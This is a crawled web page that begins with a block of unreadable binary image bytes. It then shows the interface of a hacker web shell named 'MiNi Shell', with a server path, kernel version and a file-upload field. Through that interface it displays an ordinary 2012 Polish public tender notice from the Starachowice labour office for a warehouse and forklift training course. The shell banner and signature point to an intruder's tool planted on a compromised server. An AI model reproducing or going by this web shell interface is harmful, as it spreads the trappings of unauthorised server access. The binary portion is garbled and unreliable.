JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120521/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120521/164618-N-2012.html

<p class="kh_header"><b>Starachowice: Zorganizowanie i przeprowadzenie szkolenia dla 10 osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Starachowicach mającego na celu nabycie przez uczestników szkolenia nowych umiejętności i kwalifikacji w zakresie: Pracownik hurtowni i magazynu z obsługą wózka podnośnikowego. Znak sprawy ZP/8/2012</b><br>
<b>Numer ogłoszenia: 164618 - 2012; data zamieszczenia: 21.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Starachowicach , ul. Radomska 76, 27-200 Starachowice, woj. świętokrzyskie, tel. 41 273 62 00, faks 41 273 62 60.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pup-starachowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie szkolenia dla 10 osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Starachowicach mającego na celu nabycie przez uczestników szkolenia nowych umiejętności i kwalifikacji w zakresie: Pracownik hurtowni i magazynu z obsługą wózka podnośnikowego. Znak sprawy ZP/8/2012.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zorganizowanie i przeprowadzenie szkolenia dla 10 osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Starachowicach mającego na celu nabycie przez uczestników szkolenia nowych umiejętności i kwalifikacji w zakresie: Pracownik hurtowni i magazynu z obsługą wózka podnośnikowego.
Kod zgodnie ze słownikiem CPV 80530000-8. Znak sprawy ZP/8/2012
-	Celem szkolenia jest uzyskanie nowych umiejętności i kwalifikacji przez uczestników szkolenia.
-	Proponowana liczba godz.: 180 według przedłożonego programu szkolenia.
-	Zamówienie ma być zrealizowane zgodnie z programem szkolenia. Wymaga się, aby zajęcia odbywały się codziennie od poniedziałku do piątku. W przypadkach uzasadnionych dopuszcza się odbywanie szkolenia w soboty. Niedopuszczalne jest zaplanowanie i prowadzenie zajęć w niedzielę oraz w dni ustawowo wolne od pracy.
-	Maksymalna dzienna liczba godzin szkolenia nie może przekroczyć 8 godzin zegarowych. Plan nauczania powinien obejmować przeciętnie nie mniej niż 25 godzin zegarowych 
w tygodniu.
-   Miejsce realizacji szkolenia:  miasto Starachowice lub miejscowość w promieniu do 60 km 
     od Starachowic, 
-  W przypadku gdy, szkolenie będzie realizowane poza miastem Starachowice, koszty   
      transportu ( dojazdu) uczestników szkolenia pokrywa Wykonawca.
-  Wykonawca zapewni odpowiednią kadrę szkoleniową oraz opracuje szczegółowy harmonogram szkolenia.
-  Wykonawca zapewni opiekuna sprawującego nadzór nad grupą szkoleniową oraz czuwającą nad prawidłową realizacją szkolenia  
-	Wykonawca zapewni niezbędny sprzęt dla prawidłowego przeprowadzenia szkolenia.
-	Wykonawca zapewni warunki szkolenia zgodne z przepisami bezpieczeństwa i higieny pracy. 
-	Każdy uczestnik szkolenia, w dniu rozpoczęcia zajęć otrzyma materiały piśmienne (zeszyt, długopis, itp.), materiały dydaktyczne (podręczniki, skrypty, inne materiały niezbędne do realizacji szkolenia) oraz szczegółowy harmonogram szkolenia. 
-	Wykonawca zapewni ubezpieczenie od następstw nieszczęśliwych wypadków dla uczestników szkolenia z wyjątkiem osób posiadających z tytułu uczestnictwa w szkoleniu prawo do stypendium szkoleniowego.
-     Ewentualny egzamin  zorganizuje i opłaci Wykonawca zamówienia. 
-   Wykonawca wyda dokument (zaświadczenie, dyplom, certyfikat), potwierdzający ukończenie szkolenia  zawierający numer z rejestru, imię i nazwisko oraz numer PESEL uczestnika szkolenia, a w przypadku cudzoziemca numer dokumentu 
      stwierdzającego tożsamość, nazwę instytucji szkoleniowej przeprowadzającej szkolenie, 
      formę i nazwę szkolenia, okres trwania szkolenia, miejsce i datę wydania zaświadczenia             
      lub innego dokumentu  potwierdzającego ukończenie szkolenia i uzyskanie kwalifikacji, 
      tematy i wymiar godzin zajęć edukacyjnych, podpis osoby upoważnionej przez instytucję 
      szkoleniową  przeprowadzającą szkolenie.
- Zamawiający przewiduje możliwość zmiany np: terminu wykonania zamówienia  
     (wcześniejsze, późniejsze wykonanie przedmiotu zamówienia), liczby uczestników 
      szkolenia przed jego rozpoczęciem. W przypadku zmiany liczby uczestników szkolenia 
     Zamawiający dokona zapłaty za liczbę osób faktycznie rozpoczynających szkolenie 
     (tj. iloczyn liczby osób rozpoczynających szkolenie i ceny jednostkowej).
-   Przez cenę jednostkową należy rozumieć iloraz ceny brutto oferty i liczby uczestników 
      szkolenia określonej w opisie przedmiotu zamówienia. 
- Zamawiający przewiduje możliwość zmiany przez Wykonawcę składu komisji       
      egzaminacyjnej, osoby sprawującej nadzór nad prawidłową realizacją szkolenia, kadry 
      dydaktycznej mającej  prowadzić to szkolenie pod warunkiem, że nowa kadra 
       zaproponowana przez Wykonawcę będzie posiadać tożsame kwalifikacje z wymienioną 
       kadrą w złożonej ofercie. Zmiany te nie będą powodować aneksowania umowy, a jedynie 
      wymagają akceptacji  Zamawiającego po wcześniejszym pisemnym jego powiadomieniu.
-  Zamawiający przewiduje możliwość zmiany przez Wykonawcę sprzętu technicznego 
      wykorzystywanego podczas przeprowadzania szkolenia określonego załączniku nr 3 
      do SIWZ oraz w ofercie jednostki  szkolącej - załącznik nr 7 do SIWZ pod warunkiem, 
      że wymieniony sprzęt znajdzie zastosowanie  podczas przeprowadzania tego szkolenia. 
      Zmiana ta wymaga akceptacji Zamawiającego.
-  Zamawiający przewiduje możliwość zmiany przez Wykonawcę miejsca odbywania 
      szkolenia pod warunkiem, że nowe miejsce szkolenia/ kursu wskazane przez Wykonawcę 
      będzie mieścić się w tej samej miejscowości, którą wskazał Wykonawca w złożonej 
      ofercie. Zmiana ta wymaga akceptacji Zamawiającego.
-    Zamawiający przewiduje możliwość zmiany osób wskazanych w umowie, upoważnionych 
     do kontaktów.   
-    Wykonawca zapewni serwis kawowy dla uczestników szkolenia.   
-   W przypadku zmiany wysokości podatku VAT  od towarów i usług cena brutto przedmiotu 
     zamówienia może ulec zmianie o wartość wzrostu lub spadku tego podatku.
-  Przed podpisaniem umowy Wykonawca w terminie 5 dni od dnia pozyskania 
      informacji o wyborze najkorzystniejszej oferty, jest zobowiązany dostarczyć 
      Zamawiającemu: 
     a)  - aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeśli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Dokument można złożyć w formie oryginału lub kopii poświadczonej za zgodność z oryginałem.
     b)  wzór ankiety dla uczestników szkolenia,
     c) wzór dokumentacji potwierdzającej ukończenie szkolenia tj. wzór zaświadczenia, 
          dyplomu, uprawnienia itp.
     d)  harmonogram zajęć,
     e)szczegółowy program szkolenia w szczególności zawierający:
          - nazwę i zakres szkolenia,
          - czas trwania i sposób organizacji szkolenia,
          - wymagania wstępne dla uczestników szkolenia,
          - cele szkolenia,
          - plan nauczania określający tematy zajęć edukacyjnych oraz ich wymiar, 
              z uwzględnieniem w miarę potrzeby, części teoretycznej i części praktycznej,
          - opis treści szkolenia w zakresie poszczególnych zajęć edukacyjnych,
          - wykaz literatury oraz niezbędnych środków i materiałów dydaktycznych,
          - przewidziane sprawdziany i egzaminy.   
Program szkolenia powinien być sporządzony z wykorzystaniem standardów kwalifikacji
i modułowych programów szkoleń zawodowych, o ile są one dostępne w bazach danych prowadzonych przez ministra.
Nie dostarczenie przez Wykonawcę w/w dokumentów, będzie skutkowała odstąpieniem przez Zamawiającego od podpisania umowy. 
- W przypadku osób działających jako pełnomocnicy, do oferty należy dołączyć   
     pełnomocnictwo w formie oryginału lub formie poświadczonej notarialnie kopii.
-   Przed rozliczeniem finansowym przedmiotu zamówienia Zamawiający w formie protokołu  
    dokona odbioru zadania zleconego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wnoszenia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Na podstawie złożonego oświadczenia w trybie art. 22 ust 1 ustawy prawo zamówień  
   publicznych - załącznik nr 1 do SIWZ,   
- Na podstawie złożonego oświadczenia Wykonawcy o posiadaniu wpisu do rejestru 
    instytucji szkoleniowych prowadzonego przez Wojewódzki Urząd Pracy właściwy ze 
    względu na siedzibę instytucji szkoleniowej /przepisy ustawy z dnia 20.04.2004r. 
    o promocji zatrudnienia i instytucjach rynku pracy art. 20 ust.1/- załącznik nr 2 do SIWZ.
Zamawiający dokona sprawdzenia w Rejestrze Instytucji Szkoleniowych czy instytucja szkoleniowa posiada w/w wpis oraz czy kontynuuje swoją działalność w bieżącym roku.
Zamawiający dokona oceny spełnienia w/w warunku na podstawie oświadczeń                            i dokumentów dołączonych do oferty zgodnie z formułą: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-  Warunkiem uczestnictwa w postępowaniu jest przeprowadzenie z należytą starannością       
    w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres 
    prowadzenia działalności jest krótszy - w tym okresie przynajmniej jednego szkolenia o tej 
    samej tematyce co przedmiot   zamówienia.
- Na podstawie złożonego dokumentu potwierdzającego przeprowadzenie z należytą 
    starannością przynajmniej jednego szkolenia o tej samej tematyce co przedmiot 
    zamówienia. Dokumentem potwierdzającym przeprowadzenie szkolenia może być 
   dokument, który jednoznacznie potwierdzi należyte wykonanie usługi w przedmiocie 
    zamówienia np. list referencyjny, protokół odbioru usługi szkoleniowej itp. wydany przez 
    jednostkę, dla której Wykonawca ubiegający się o udzielenie  zamówienia przeprowadził 
    szkolenie o tej samej tematyce co przedmiot zamówienia. Dokument ten musi zawierać 
    termin jego przeprowadzenia.
- Na podstawie złożonego oświadczenia w trybie art. 22 ust 1 ustawy prawo zamówień 
    publicznych - załącznik nr 1 do SIWZ,
Zamawiający dokona oceny spełnienia w/w warunku na podstawie oświadczeń i dokumentów dołączonych do oferty zgodnie z formułą: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Na podstawie złożonego oświadczenia w trybie art. 22 ust 1 ustawy prawo zamówień  
   publicznych - załącznik nr 1 do SIWZ,    
- Na podstawie złożonego oświadczenia o dysponowaniu odpowiednim potencjałem 
    technicznym zapewniającym wykonanie przedmiotu zamówienia - załącznik nr 3 do SIWZ. 
W przypadku gdy w miejscu odbywania szkolenia jednostka szkoląca nie posiada własnej bazy szkoleniowej do przeprowadzenia szkolenia na spełnienie tego warunku należy dołączyć dodatkowo np.: zobowiązanie do współpracy, umowę przedwstępną użyczenia, dzierżawy, najmu bazy szkoleniowej, w której winny zostać określone: warunki lokalowe, wyposażenie sal do przeprowadzenia zajęć, pomoce dydaktyczne, sprzęt techniczny oraz warunki socjalne.              
    W przypadku braku tych zapisów w w/w dokumentach, te informacje proszę zawrzeć               
    w załączniku nr 3 do SIWZ.
Zamawiający dokona oceny spełnienia w/w warunków na podstawie oświadczeń                            i dokumentów dołączonych do oferty zgodnie z formułą: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-  Na podstawie złożonego oświadczenia w trybie art. 22 ust 1 ustawy prawo zamówień  
     publicznych - załącznik nr 1 do SIWZ,    
-   Na podstawie złożonego oświadczenia o dysponowaniu osobami zdolnymi do wykonania 
     przedmiotu zamówienia - załącznik nr 4 do SIWZ.
Zamawiający dokona oceny spełnienia w/w warunków na podstawie oświadczeń                            dołączonych do oferty zgodnie z formułą: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-  Na podstawie złożonego oświadczenia o sytuacji finansowej gwarantującej  realizację  
      przedmiotu zamówienia, złożonego oświadczenia o niezaleganiu z opłacaniem  podatków  
      oraz o niezaleganiu z opłacaniem opłat oraz składek na ubezpieczenie zdrowotne 
      i społeczne, ewentualnie oświadczenie o uzyskaniu przewidzianym prawem zwolnieniu, 
      odroczeniu lub rozłożeniu na raty zaległych płatności - załącznik nr 5 do SIWZ, 
      lub
- Na podstawie aktualnego zaświadczenia właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Kwalifikacje kadry dydaktycznej mającej prowadzić to szkolenie - 10</li>
<li>3 - Kryterium jakości świadczonych usług przez Wykonawcę - 10</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Z Wykonawcą, który złożył najkorzystniejszą ofertę zostanie zawarta umowa, której  
     projekt stanowi załącznik Nr 8 do niniejszej specyfikacji.
2. Zamawiający przewiduje możliwość zmiany np: terminu wykonania  zamówienia                 
     (wcześniejsze, późniejsze wykonanie przedmiotu zamówienia), liczby uczestników 
      szkolenia przed jego rozpoczęciem. W przypadku zmiany  liczby uczestników szkolenia 
     Zamawiający dokona zapłaty za liczbę osób faktycznie rozpoczynającą szkolenie 
     (tj. iloczyn liczby osób rozpoczynających szkolenie i ceny jednostkowej).
3. Zamawiający przewiduje możliwość zmiany przez Wykonawcę składu komisji 
     egzaminacyjnej, osoby sprawującej nadzór nad prawidłową realizacją szkolenia, kadry  
     dydaktycznej mającej  prowadzić to szkolenie pod warunkiem, że nowa kadra 
      zaproponowana przez Wykonawcę będzie posiadać tożsame kwalifikacje z wymienioną 
      kadrą w złożonej ofercie. Zmiany te nie będą powodować aneksowania umowy, a jedynie 
     wymagają akceptacji  Zamawiającego po wcześniejszym pisemnym jego powiadomieniu.
4. Zamawiający przewiduje możliwość zmiany przez Wykonawcę miejsca odbywania 
      szkolenia pod warunkiem, że nowe miejsce szkolenia/ kursu wskazane przez Wykonawcę 
     będzie mieścić się w tej samej miejscowości, którą wskazał Wykonawca w złożonej 
     ofercie. Zmiana ta wymaga akceptacji Zamawiającego.
5. Zamawiający przewiduje możliwość zmiany przez Wykonawcę sprzętu technicznego 
     wykorzystywanego podczas przeprowadzania szkolenia określonego załączniku nr 3 do    
     SIWZ oraz w ofercie jednostki  szkolącej - załącznik nr 7 do SIWZ pod warunkiem,                   
     że wymieniony sprzęt znajdzie zastosowanie  podczas przeprowadzania tego szkolenia.  
     Zmiana ta wymaga akceptacji Zamawiającego.
6. Zamawiający przewiduje możliwość zmiany osób wskazanych w umowie, upoważnionych 
    do kontaktów.   
7. W przypadku zmiany wysokości podatku VAT  od towarów i usług cena brutto przedmiotu 
    zamówienia może ulec zmianie o wartość wzrostu lub spadku tego podatku
8. Na podstawie art. 145 ustawy prawo zamówień publicznych w razie zaistnienia istotnej 
     zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, 
     czego nie można było przewidzieć w chwili zawarcia umowy, zamawiający może odstąpić 
     od umowy w terminie 30 dni od powzięcia wiadomości o tych okolicznościach.
     W tym przypadku wykonawca może żądać wyłącznie wynagrodzenia należytego z tytułu 
     wykonania części umowy.
UWAGA!
Przed podpisaniem umowy Wykonawca w terminie 5 dni od dnia pozyskania informacji   
     o wyborze najkorzystniejszej oferty, jest zobowiązany dostarczyć Zamawiającemu: 
          a)  - aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeśli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Dokument można złożyć w formie oryginału lub kopii poświadczonej za zgodność z oryginałem.
     b)  wzór ankiety dla uczestników szkolenia,
     c) wzór dokumentacji potwierdzającej ukończenie szkolenia tj. wzór zaświadczenia, 
          dyplomu, uprawnienia itp.
     d)  harmonogram zajęć,
     e) szczegółowy program szkolenia w szczególności zawierający:
          - nazwę i zakres szkolenia,
          - czas trwania i sposób organizacji szkolenia,
          - wymagania wstępne dla uczestników szkolenia,
          - cele szkolenia,
          - plan nauczania określający tematy zajęć edukacyjnych oraz ich wymiar, 
            z uwzględnieniem w miarę potrzeby, części teoretycznej i części praktycznej,
          - opis treści szkolenia w zakresie poszczególnych zajęć edukacyjnych,
          - wykaz literatury oraz niezbędnych środków i materiałów dydaktycznych,
          - przewidziane sprawdziany i egzaminy.   
Program szkolenia powinien być sporządzony z wykorzystaniem standardów kwalifikacji
i modułowych programów szkoleń zawodowych, o ile są one dostępne w bazach danych prowadzonych przez ministra.
Nie dostarczenie przez Wykonawcę w/w dokumentów, będzie skutkowała odstąpieniem przez Zamawiającego od podpisania umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pup-starachowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.pup-starachowice.pl  Zakładka zamówienia publiczne.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.05.2012 godzina 12:00, miejsce: Siedziba Zamawiającego : 
     Powiatowy Urząd Pracy w Starachowicach ul. Radomska 76, w pokoju 210.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> -  Zamawiający nie dopuszcza składania ofert częściowych.
-  Zamawiający nie dopuszcza składania ofert wariantowych.
-  Zamawiający nie przewiduje zamówień uzupełniających.
-  Zamawiający nie przewiduje zawarcia umowy ramowej.
-  Zamawiający nie przewiduje ustanowienia dynamicznego systemu zakupów.
-  Zamawiający nie przewiduje zastosowania aukcji elektronicznej.
-  Otwarcie ofert nastąpi w dniu 29.05.2012 r. o godz. 
    12:10 w siedzibie Zamawiającego w pokoju  nr 208. Otwarcie ofert jest jawne.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com